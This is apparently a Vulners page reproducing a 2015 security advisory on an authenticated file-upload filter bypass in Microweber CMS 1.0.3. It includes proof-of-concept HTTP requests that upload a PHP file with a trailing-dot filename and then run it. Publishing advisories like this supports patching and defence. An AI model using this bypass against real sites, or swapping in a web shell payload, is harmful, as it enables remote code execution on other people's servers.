Vulners
Lucene search
Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution
Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution
Vendor: Microweber Team
Product web page: http://www.microweber.com
Affected version: 1.0.3
Summary: Microweber is an open source drag and drop PHP/Laravel CMS licensed
under Apache License, Version 2.0 which allows you to create your own website,
blog or online shop.
Desc: Microweber suffers from an authenticated arbitrary command execution
vulnerability. The issue is caused due to the improper verification when
uploading files in '/src/Microweber/functions/plupload.php' script. This
can be exploited to execute arbitrary PHP code by bypassing the extension
restriction by putting the dot character at the end of the filename and uploading
a malicious PHP script file that will be stored in '/userfiles/media/localhost/uploaded'
directory.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5250
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php
12.07.2015
--
PoC Requests:
-------------
1.
POST /microweber-latest/plupload?token=1111111111222222222233333333334444444444&path=media%25255Clocalhost%25255C&path=media%255Clocalhost%255Cuploaded%255C HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 319
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqX83MP6Cg5JpA193
Accept: */*
Referer: http://localhost/microweber-latest/editor_tools/plupload?type=explorer&filters=*&multiple=true&autostart=undefined&mwv=1.0.3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: mwui=%7B%22%23modules-and-layouts%2C%23tab_modules%2C.tst-modules%22%3A%22true%22%7D; recommend=%7B%22logo%22%3A1%7D; back_to_admin=http%3A//localhost/microweber-latest/admin/view%3Amodules/load_module%3Afiles%23path%3Dmedia%255Clocalhost%255Cuploaded%255C%26select-file%3Dhttp%3A//localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php; laravel_session=eyJpdiI6ImNYNnkyWjJkOXZyTVRDMXlcL0pKQzBRPT0iLCJ2YWx1ZSI6Ilp6QjhDYjRRMEY4NGR5RzVuZGNxSnd1V3dGQ1R6OVdaWjZrZStiT1Q2bVM3UmRoQjNrak1ORzV5bXZjbzVDSitqdVVkdzdqOFVQa2hZdWRwMlwvMSttZz09IiwibWFjIjoiNGQxYzkwOTk4YmIzNTgzNWRiZmZlOTM4N2I2MzA1NjIzODcwNWRmMWM5ZDcwN2YxMGJlZmQ2ZjUxYmMzNjVjOSJ9
------WebKitFormBoundaryqX83MP6Cg5JpA193
Content-Disposition: form-data; name="name"
phpinfo.php.
------WebKitFormBoundaryqX83MP6Cg5JpA193
Content-Disposition: form-data; name="file"; filename="phpinfo.php."
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundaryqX83MP6Cg5JpA193--
2.
GET http://localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php HTTP/1.1Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Aug 2015 00:00Current
7.4High risk
Vulners AI Score7.4